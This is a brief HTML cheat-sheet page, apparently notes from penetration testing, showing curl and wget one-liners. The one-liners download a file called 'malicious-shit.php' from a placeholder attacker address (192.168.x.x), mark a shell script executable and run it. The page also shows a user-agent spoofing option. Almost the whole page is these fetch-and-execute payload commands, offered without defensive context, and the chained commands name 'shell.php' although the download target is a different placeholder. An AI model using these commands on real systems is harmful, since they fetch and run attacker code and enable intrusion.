<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Curl-WGET</title>
</head><body>curl -o &lt;filename&gt; http://192.168.x.x/malicious-shit.php<br/>
<br/>
you can also pipe in commands too such as<br/>
<br/>
curl -o &lt;filename&gt; http://192.168.x.x/malicious-shit.php ; chmod +x shell.php ; ./shell.php<br/>
<br/>
User agent change<br/>
<br/>
curl -A "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" <br/>
<br/>
-----------------------<br/>
<br/>
wget -O &lt;filename&gt; http://192.168.x.x/malicious-shit.php<br/>
<br/>
you can also pipe in commands too such as<br/>
<br/>
wget -O &lt;filename&gt; http://192.168.x.x/malicious-shit.php ; chmod +x shell.php ; ./shell.php</body></html>